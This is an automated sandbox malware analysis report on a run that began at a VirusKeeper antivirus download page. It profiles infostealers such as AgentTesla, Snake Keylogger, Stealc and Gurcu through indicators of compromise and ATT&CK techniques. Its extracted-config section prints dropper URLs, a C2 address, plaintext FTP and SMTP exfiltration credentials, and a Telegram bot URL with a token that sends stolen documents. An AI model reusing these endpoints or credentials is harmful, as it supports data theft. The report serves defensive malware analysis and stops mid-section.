agenttesla | hxxps://www[.]viruskeeper[.]com/fr/telecharger[.]html

Resubmissions

05-11-2024 13:55

241105-q74hdstakj 10

05-11-2024 13:33

241105-qtwwdsvjdk 8

Analysis

max time kernel
1499s
max time network
1500s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
05-11-2024 13:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://www.viruskeeper.com/fr/telecharger.html

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

exe.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

Extracted

Family

agenttesla

Credentials

Protocol: ftp
Host:
ftp://ftp.antoniomayol.com:21
Port:
21
Username:
[email protected]
Password:
cMhKDQUk1{;%

Extracted

Family

snakekeylogger

Credentials

Protocol: smtp
Host:
mail.sispimx.org
Port:
26
Username:
[email protected]
Password:
W^418d5gv
Email To:
[email protected]

Extracted

Family

stealc

Botnet

tale

http://185.215.113.206

Attributes

url_path
/6c4adf523b719729.php

Extracted

Family

gurcu

https://api.telegram.org/bot7824077250:AAFcoqx_HuY2oC2csA-0G-hez0Tv78Sn08E/sendDocument?chat_id=7546472414&caption=%20Pc%20Name:%20Admin%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20Admin%20%7C%20Snak

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Agenttesla family
agenttesla
Formbook
Formbook is a data stealing malware which is capable of stealing data.
trojan spyware stealer formbook
Formbook family
formbook
Gurcu family
gurcu
Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
stealer gurcu
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Lokibot family
lokibot
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
stealer keylogger snakekeylogger

Snake Keylogger payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/6584-5168-0x0000000000400000-0x0000000000426000-memory.dmp	family_snakekeylogger

Snakekeylogger family
snakekeylogger
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

2387dfcd993c8035b2f72ad89935d4521b294010115384aaa9cf93813f7ae4ce.exe

description pid process target process

PID 5444 created 3544 5444 2387dfcd993c8035b2f72ad89935d4521b294010115384aaa9cf93813f7ae4ce.exe Explorer.EXE
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

89257c8d1539e39a63211cdbe9436f90ed30ee944633acbb5b874c8d7dc0d888.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 89257c8d1539e39a63211cdbe9436f90ed30ee944633acbb5b874c8d7dc0d888.exe
Blocklisted process makes network request 4 IoCs

Processes:

PoWERshElL.ExEpowershell.exe

flow pid process

841 6964 PoWERshElL.ExE
845 1076 powershell.exe
846 1076 powershell.exe
873 1076 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

3924 powershell.exe
1076 powershell.exe
Downloads MZ/PE file
Evasion via Device Credential Deployment 2 IoCs
defense_evasion execution

Processes:

PoWERshElL.ExEpowershell.exe

pid process

6964 PoWERshElL.ExE
1544 powershell.exe

description	pid	process	target process
PID 5444 created 3544	5444	2387dfcd993c8035b2f72ad89935d4521b294010115384aaa9cf93813f7ae4ce.exe	Explorer.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	89257c8d1539e39a63211cdbe9436f90ed30ee944633acbb5b874c8d7dc0d888.exe

flow	pid	process
841	6964	PoWERshElL.ExE
845	1076	powershell.exe
846	1076	powershell.exe
873	1076	powershell.exe

pid	process
3924	powershell.exe
1076	powershell.exe

pid	process
6964	PoWERshElL.ExE
1544	powershell.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

89257c8d1539e39a63211cdbe9436f90ed30ee944633acbb5b874c8d7dc0d888.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	89257c8d1539e39a63211cdbe9436f90ed30ee944633acbb5b874c8d7dc0d888.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	89257c8d1539e39a63211cdbe9436f90ed30ee944633acbb5b874c8d7dc0d888.exe

Checks computer location settings 2 TTPs 10 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

vk_restart.exevk_oascan.exeWScript.exeviruskeeper.exemshta.exeWScript.exeVirusKeeper.exeviruskeeper.exevk_watchop.exevk_run.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	vk_restart.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	vk_oascan.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	viruskeeper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	VirusKeeper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	viruskeeper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	vk_watchop.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	vk_run.exe

Drops startup file 4 IoCs

Processes:

2387dfcd993c8035b2f72ad89935d4521b294010115384aaa9cf93813f7ae4ce.exePO.exevehiculate.exeepistemology.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IgnorePersistedDecision.vbs	2387dfcd993c8035b2f72ad89935d4521b294010115384aaa9cf93813f7ae4ce.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PO.vbs	PO.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vehiculate.vbs	vehiculate.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\epistemology.vbs	epistemology.exe

Executes dropped EXE 53 IoCs

Processes:

setup.exesetup.tmpvk_service.exevk_ss.exevk_service.exeVirusKeeper.exevk_restart.exevksoft.exevkw.exeviruskeeper.exevk_oascan.exevk_planrun.exevk_scanfile.exevk_scanint.exevk_scanint.exevk_scanint.exeSetup.exenc.exevk_watchop.exeSetup.exenc.exe7eee1eb6d127253d4b70049f7c69338287b42dfee47a3b4926e5937fd9bd6250.exeepistemology.exevk_scanfile.exe09ea9be2d95a4e1ebbf2ca8c792e5d69daeffedda8cde261fdcbd32d2d0b5f8d.exevk_scan.exevk_scanfile.exevk_scanfile.exe9d119e13c731d90fa65a23f934bb8d76d2d23eb444cb35b24f889cfd3bafc59e.exe26cc490b994c070a5329725ef25a76af9afe2d4a9f5d11df8ed4c1dd040003f9.exevk_run.exevk_scanfile.exeProcessWatch2.exevk_run.exeviruskeeper.exevk_secad.exe32b786ed47a62c8c8f2332299722b31f2149cf370689691268bf88fb1dae35ea.exe869acdb8281279b9c58cf1c0bc8fc4a3b13d26c81bfa7e8970ea1991f77d32b3.exe2387dfcd993c8035b2f72ad89935d4521b294010115384aaa9cf93813f7ae4ce.exevk_scanfile.exevk_scanfile.exe42935d2557a1d94823d32a2d9e6017a33f961b9e672292beed123d4b41c81c20.exePO.exevk_scanfile.exe89257c8d1539e39a63211cdbe9436f90ed30ee944633acbb5b874c8d7dc0d888.exe1918587221eb57d1b227dd6472fcf43adb642077f1a24e0f3e24b9f48e5e01b0.exevehiculate.exevk_scanfile.exevk_oascan.exevk_planrun.exevk_scan.exevk_scanfile.exevk_watchop.exe

pid	process
4072	setup.exe
2832	setup.tmp
784	vk_service.exe
4944	vk_ss.exe
2436	vk_service.exe
3148	VirusKeeper.exe
2220	vk_restart.exe
2040	vksoft.exe
7136	vkw.exe
6836	viruskeeper.exe
5460	vk_oascan.exe
4456	vk_planrun.exe
4972	vk_scanfile.exe
4888	vk_scanint.exe
6800	vk_scanint.exe
5620	vk_scanint.exe
1680	Setup.exe
3196	nc.exe
1960	vk_watchop.exe
3960	Setup.exe
5696	nc.exe
6220	7eee1eb6d127253d4b70049f7c69338287b42dfee47a3b4926e5937fd9bd6250.exe
6244	epistemology.exe
836	vk_scanfile.exe
1948	09ea9be2d95a4e1ebbf2ca8c792e5d69daeffedda8cde261fdcbd32d2d0b5f8d.exe
3248	vk_scan.exe
3712	vk_scanfile.exe
2680	vk_scanfile.exe
5612	9d119e13c731d90fa65a23f934bb8d76d2d23eb444cb35b24f889cfd3bafc59e.exe
5064	26cc490b994c070a5329725ef25a76af9afe2d4a9f5d11df8ed4c1dd040003f9.exe
3228	vk_run.exe
6964	vk_scanfile.exe
4508	ProcessWatch2.exe
6196	vk_run.exe
5640	viruskeeper.exe
3732	vk_secad.exe
7020	32b786ed47a62c8c8f2332299722b31f2149cf370689691268bf88fb1dae35ea.exe
3476	869acdb8281279b9c58cf1c0bc8fc4a3b13d26c81bfa7e8970ea1991f77d32b3.exe
5444	2387dfcd993c8035b2f72ad89935d4521b294010115384aaa9cf93813f7ae4ce.exe
5216	vk_scanfile.exe
1852	vk_scanfile.exe
2260	42935d2557a1d94823d32a2d9e6017a33f961b9e672292beed123d4b41c81c20.exe
1648	PO.exe
4852	vk_scanfile.exe
4136	89257c8d1539e39a63211cdbe9436f90ed30ee944633acbb5b874c8d7dc0d888.exe
1148	1918587221eb57d1b227dd6472fcf43adb642077f1a24e0f3e24b9f48e5e01b0.exe
5780	vehiculate.exe
5392	vk_scanfile.exe
4956	vk_oascan.exe
6408	vk_planrun.exe
5724	vk_scan.exe
2668	vk_scanfile.exe
3484	vk_watchop.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

89257c8d1539e39a63211cdbe9436f90ed30ee944633acbb5b874c8d7dc0d888.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine	89257c8d1539e39a63211cdbe9436f90ed30ee944633acbb5b874c8d7dc0d888.exe

Loads dropped DLL 64 IoCs

Processes:

vk_service.exevk_service.exeVirusKeeper.exevksoft.exeviruskeeper.exevk_oascan.exevk_planrun.exevk_scanfile.exevk_scanint.exevk_scanint.exevk_scanint.exeSetup.exevk_watchop.exeSetup.exeAutoIt3.exeAutoIt3.exevk_scanfile.exevk_scan.exe

pid	process
784	vk_service.exe
784	vk_service.exe
784	vk_service.exe
784	vk_service.exe
784	vk_service.exe
2436	vk_service.exe
2436	vk_service.exe
2436	vk_service.exe
2436	vk_service.exe
2436	vk_service.exe
3148	VirusKeeper.exe
3148	VirusKeeper.exe
3148	VirusKeeper.exe
3148	VirusKeeper.exe
3148	VirusKeeper.exe
2040	vksoft.exe
6836	viruskeeper.exe
6836	viruskeeper.exe
6836	viruskeeper.exe
6836	viruskeeper.exe
6836	viruskeeper.exe
5460	vk_oascan.exe
5460	vk_oascan.exe
5460	vk_oascan.exe
4456	vk_planrun.exe
4456	vk_planrun.exe
4456	vk_planrun.exe
4456	vk_planrun.exe
4456	vk_planrun.exe
4972	vk_scanfile.exe
4972	vk_scanfile.exe
4972	vk_scanfile.exe
4888	vk_scanint.exe
4888	vk_scanint.exe
4888	vk_scanint.exe
6800	vk_scanint.exe
6800	vk_scanint.exe
6800	vk_scanint.exe
5620	vk_scanint.exe
5620	vk_scanint.exe
5620	vk_scanint.exe
1680	Setup.exe
1680	Setup.exe
1680	Setup.exe
1680	Setup.exe
1680	Setup.exe
1680	Setup.exe
1960	vk_watchop.exe
1960	vk_watchop.exe
1960	vk_watchop.exe
1960	vk_watchop.exe
1960	vk_watchop.exe
3960	Setup.exe
3960	Setup.exe
3960	Setup.exe
3960	Setup.exe
3960	Setup.exe
3960	Setup.exe
6108	AutoIt3.exe
5424	AutoIt3.exe
836	vk_scanfile.exe
836	vk_scanfile.exe
836	vk_scanfile.exe
3248	vk_scan.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs

collection

Email Collection

T1114

Processes:

aspnet_regbrowsers.exeInstallUtil.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	aspnet_regbrowsers.exe
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	aspnet_regbrowsers.exe
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	InstallUtil.exe
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	InstallUtil.exe
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	InstallUtil.exe
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	aspnet_regbrowsers.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

setup.tmpcontrol.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\VirusKeeper = "C:\\Program Files (x86)\\AxBx\\VirusKeeper 2024 Free Edition\\VirusKeeper.exe"	setup.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\OZ4PDJHH = "C:\\Program Files (x86)\\P9rtpgpex\\tnmlgfi.exe"	control.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Enumerates connected drives 3 TTPs 2 IoCs
Attempts to read the root path of hard drives other than the default C: drive.

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Processes:

vk_secad.exe

description ioc process

File opened (read-only) \??\D: vk_secad.exe
File opened (read-only) \??\F: vk_secad.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service
T1102

Processes:

flow ioc

728 drive.google.com
729 drive.google.com
844 drive.google.com
845 drive.google.com
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

720 ip-api.com
741 api.ipify.org
742 api.ipify.org
863 checkip.dyndns.org

description	ioc	process
File opened (read-only)	\??\D:	vk_secad.exe
File opened (read-only)	\??\F:	vk_secad.exe

flow	ioc
728	drive.google.com
729	drive.google.com
844	drive.google.com
845	drive.google.com

flow	ioc
720	ip-api.com
741	api.ipify.org
742	api.ipify.org
863	checkip.dyndns.org

Maps connected drives based on registry 3 TTPs 3 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vk_secad.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	vk_secad.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	vk_secad.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	vk_secad.exe

Mark of the Web detected: This indicates that the page was originally saved or cloned. 1 IoCs
phishing motw

Processes:

flow ioc

543 https://storage.googleapis.com/script.aniview.com/ssync/62f53b2c7850d0786f227f64/ssync.html

flow	ioc
543	https://storage.googleapis.com/script.aniview.com/ssync/62f53b2c7850d0786f227f64/ssync.html

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\Downloads\samples\32b786ed47a62c8c8f2332299722b31f2149cf370689691268bf88fb1dae35ea\32b786ed47a62c8c8f2332299722b31f2149cf370689691268bf88fb1dae35ea.exe	autoit_exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

26cc490b994c070a5329725ef25a76af9afe2d4a9f5d11df8ed4c1dd040003f9.exe

pid process

4368 26cc490b994c070a5329725ef25a76af9afe2d4a9f5d11df8ed4c1dd040003f9.exe

pid	process
4368	26cc490b994c070a5329725ef25a76af9afe2d4a9f5d11df8ed4c1dd040003f9.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

Processes:

26cc490b994c070a5329725ef25a76af9afe2d4a9f5d11df8ed4c1dd040003f9.exe26cc490b994c070a5329725ef25a76af9afe2d4a9f5d11df8ed4c1dd040003f9.exe89257c8d1539e39a63211cdbe9436f90ed30ee944633acbb5b874c8d7dc0d888.exe

pid	process
5064	26cc490b994c070a5329725ef25a76af9afe2d4a9f5d11df8ed4c1dd040003f9.exe
4368	26cc490b994c070a5329725ef25a76af9afe2d4a9f5d11df8ed4c1dd040003f9.exe
4136	89257c8d1539e39a63211cdbe9436f90ed30ee944633acbb5b874c8d7dc0d888.exe

Suspicious use of SetThreadContext 21 IoCs

Processes:

Setup.exeSetup.exeepistemology.exe09ea9be2d95a4e1ebbf2ca8c792e5d69daeffedda8cde261fdcbd32d2d0b5f8d.exesvchost.exe9d119e13c731d90fa65a23f934bb8d76d2d23eb444cb35b24f889cfd3bafc59e.exesvchost.execontrol.exe26cc490b994c070a5329725ef25a76af9afe2d4a9f5d11df8ed4c1dd040003f9.exewinver.exe32b786ed47a62c8c8f2332299722b31f2149cf370689691268bf88fb1dae35ea.exesvchost.exefsutil.exe2387dfcd993c8035b2f72ad89935d4521b294010115384aaa9cf93813f7ae4ce.exepowershell.exePO.exe

description	pid	process	target process
PID 1680 set thread context of 1708	1680	Setup.exe	more.com
PID 3960 set thread context of 7092	3960	Setup.exe	more.com
PID 6244 set thread context of 4320	6244	epistemology.exe	RegSvcs.exe
PID 1948 set thread context of 1584	1948	09ea9be2d95a4e1ebbf2ca8c792e5d69daeffedda8cde261fdcbd32d2d0b5f8d.exe	svchost.exe
PID 1584 set thread context of 3248	1584	svchost.exe	vk_scan.exe
PID 1584 set thread context of 3936	1584	svchost.exe	winver.exe
PID 5612 set thread context of 2832	5612	9d119e13c731d90fa65a23f934bb8d76d2d23eb444cb35b24f889cfd3bafc59e.exe	svchost.exe
PID 2832 set thread context of 3544	2832	svchost.exe	Explorer.EXE
PID 5888 set thread context of 3544	5888	control.exe	Explorer.EXE
PID 5888 set thread context of 4204	5888	control.exe	chrome.exe
PID 5064 set thread context of 4368	5064	26cc490b994c070a5329725ef25a76af9afe2d4a9f5d11df8ed4c1dd040003f9.exe	26cc490b994c070a5329725ef25a76af9afe2d4a9f5d11df8ed4c1dd040003f9.exe
PID 3936 set thread context of 3544	3936	winver.exe	Explorer.EXE
PID 3936 set thread context of 4944	3936	winver.exe	Firefox.exe
PID 7020 set thread context of 3460	7020	32b786ed47a62c8c8f2332299722b31f2149cf370689691268bf88fb1dae35ea.exe	svchost.exe
PID 3460 set thread context of 5888	3460	svchost.exe	control.exe
PID 3460 set thread context of 6104	3460	svchost.exe	fsutil.exe
PID 6104 set thread context of 5888	6104	fsutil.exe	control.exe
PID 5444 set thread context of 6584	5444	2387dfcd993c8035b2f72ad89935d4521b294010115384aaa9cf93813f7ae4ce.exe	InstallUtil.exe
PID 1076 set thread context of 5740	1076	powershell.exe	aspnet_regbrowsers.exe
PID 6104 set thread context of 6172	6104	fsutil.exe	Firefox.exe
PID 1648 set thread context of 6676	1648	PO.exe	svchost.exe

Drops file in Program Files directory 64 IoCs

Processes:

setup.tmpvk_service.exeviruskeeper.exevksoft.exeviruskeeper.exe

description	ioc	process
File created	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\is-TQVOA.tmp	setup.tmp
File created	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\reg.dat	vk_service.exe
File opened for modification	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\viruskeeper.pmj	vk_service.exe
File created	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\is-N7KPF.tmp	setup.tmp
File opened for modification	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\unins000.dat	setup.tmp
File opened for modification	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\temp.dat	viruskeeper.exe
File opened for modification	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_restart.exe	setup.tmp
File created	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\is-V9I7V.tmp	setup.tmp
File created	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\is-0SI35.tmp	setup.tmp
File opened for modification	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_dpl.dat	vk_service.exe
File opened for modification	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\asf.dat	vk_service.exe
File created	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\is-DG8B5.tmp	setup.tmp
File opened for modification	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\root.dat	vk_service.exe
File created	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vkstat.dat	vk_service.exe
File created	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_fmd.dat	vksoft.exe
File created	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\is-E1M06.tmp	setup.tmp
File created	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\is-EG1QJ.tmp	setup.tmp
File created	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\down.dat	vk_service.exe
File created	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\asf.dat	vksoft.exe
File opened for modification	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_fmd.dat	vksoft.exe
File created	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\is-LN426.tmp	setup.tmp
File opened for modification	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_sil.dat	vk_service.exe
File opened for modification	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_pw.dat	vk_service.exe
File created	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\win.dat	vk_service.exe
File created	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\sadat.dat	vksoft.exe
File opened for modification	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_report.exe	setup.tmp
File opened for modification	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\win.dat	vk_service.exe
File created	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vksoft.exe	vk_service.exe
File opened for modification	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vkscant.dat	vk_service.exe
File created	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\is-0A6E4.tmp	setup.tmp
File opened for modification	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_plan.dat	vk_service.exe
File created	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\unins000.msg	setup.tmp
File opened for modification	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\viruskeeper.upd	vk_service.exe
File opened for modification	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_ipl.dat	vk_service.exe
File opened for modification	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\reg.dat	vk_service.exe
File created	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\viruskeeper.dat	vk_service.exe
File opened for modification	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vksoft.exe	vk_service.exe
File opened for modification	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\VirusKeeper.exe	vksoft.exe
File opened for modification	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_tf.dat	vk_service.exe
File created	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\is-5GTMP.tmp	setup.tmp
File created	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\is-KB5QC.tmp	setup.tmp
File created	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\is-PKJV2.tmp	setup.tmp
File created	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\sys.dat	vk_service.exe
File created	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\$_Temp_$.$$$	viruskeeper.exe
File created	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\is-BCHSN.tmp	setup.tmp
File opened for modification	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vklog.dat	vk_service.exe
File opened for modification	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\viruskeeper.cfg	vk_service.exe
File opened for modification	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\down.dat	viruskeeper.exe
File opened for modification	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_scan.exe	setup.tmp
File opened for modification	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_secad.exe	setup.tmp
File opened for modification	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_sscan.dll	setup.tmp
File opened for modification	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_watchop.exe	setup.tmp
File opened for modification	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\sys.dat	vk_service.exe
File opened for modification	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\sys32.dat	vk_service.exe
File created	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\is-VHQ6Q.tmp	setup.tmp
File created	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\is-8LA9N.tmp	setup.tmp
File created	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\is-MNSEP.tmp	setup.tmp
File opened for modification	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\VirusKeeper.url	setup.tmp
File created	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\temp.dat	vk_service.exe
File created	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_pi.dat	vk_service.exe
File created	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vkscant.dat	vk_service.exe
File opened for modification	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\vk_run.exe	setup.tmp
File created	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\is-07V7H.tmp	setup.tmp
File created	C:\Program Files (x86)\AxBx\VirusKeeper 2024 Free Edition\is-8STL2.tmp	setup.tmp

Drops file in Windows directory 1 IoCs

Processes:

setup.tmp

description ioc process

File created C:\Windows\Fonts\is-27MCL.tmp setup.tmp
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\Fonts\is-27MCL.tmp	setup.tmp

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

vk_secad.exe

description	ioc	process
